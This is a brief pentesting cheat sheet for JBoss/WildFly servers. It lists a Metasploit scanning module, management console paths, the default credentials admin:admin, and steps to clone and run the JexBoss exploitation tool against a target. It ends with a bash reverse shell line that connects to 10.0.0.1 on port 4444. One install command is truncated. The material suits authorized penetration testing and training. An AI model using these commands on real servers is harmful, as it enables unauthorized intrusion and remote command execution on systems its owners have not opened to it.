JBOSS Pentesting

JBOSS AS (Application Server), also known as WildFly, is an application server which is written in Java.

Enumeration

msfconsole
msf > use auxiliary/scanner/http/jboss_vulnscan

Common Directories

/admin-console/
/invoker/JMXInvokerServlet
/jbossws/
/jmx-console/
/jmx-console/HtmlAdaptor
/management
/manager
/status?full=true
/web-console/
/web-console/Invoker
/web-console/ServerInfo.jsp

Default Credentials

admin:admin

Exploitation

JexBoss is available as an exploitation CLI tool.

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip3 install -r requirements.
python3 jexboss.py -host https://example.com:8080

# Reverse Shell
Shell> /bin/bash -i > /dev/tcp/10.0.0.1/4444 0>&1 2>&1